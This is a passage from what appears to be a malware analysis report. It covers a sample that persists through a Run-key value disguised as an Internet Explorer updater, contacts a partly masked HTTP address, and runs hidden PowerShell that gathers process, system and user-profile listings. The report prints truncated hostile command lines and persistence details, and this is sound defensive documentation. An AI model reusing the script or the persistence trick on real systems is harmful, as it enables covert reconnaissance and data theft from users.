Technical Information
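Autorun persistence (a value under the per-user Run key, so the listed executable is started at each logon of that user; the value name and path appear chosen to resemble an Internet Explorer updater):
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'IEUpdate' = '%APPDATA%\Microsoft\Internet Explorer\IEUpdater.exe'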
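Network activity (unencrypted HTTP on port 80; the # characters appear to mask part of the address in the report, so the address as printed cannot be used directly as a block-list entry):
- '19#.#.93.135':80
- http://19#.#.93.135/IExplorer/Version/01/Check/check.php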
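Processes started (the command lines are cut off with "..." in the report, so what is done with the collected data is not visible here. The visible part of getData gathers the process list, the systeminfo output and a recursive listing of the user profile, which accounts for the systeminfo.exe entry at the end of this list. A 32-bit cmd.exe from syswow64 starting PowerShell with a hidden window and an inline -Command script is a useful detection point in process-creation logs):
- '%WINDIR%\syswow64\cmd.exe' /c powershell -Command "$global:guid = '';$global:repeat = '1';function getData {$c = ps;$d = systeminfo;$e = Get-ChildItem -Path $env:USERPROFILE -Recurse | Out-String;return $(($c + $d + $e) ...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell -Command "$global:guid = '';$global:repeat = '1';function getData {$c = ps;$d = systeminfo;$e = Get-ChildItem -Path $env:USERPROFILE -Recurse | Out-String;return $(($c + $d + $e) ...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "$global:guid = '';$global:repeat = '1';function getData {$c = ps;$d = systeminfo;$e = Get-ChildItem -Path $env:USERPROFILE -Recurse | Out-String;return $(($c + $d + $e) -join \"`r`n\"...
- '%WINDIR%\syswow64\systeminfo.exe'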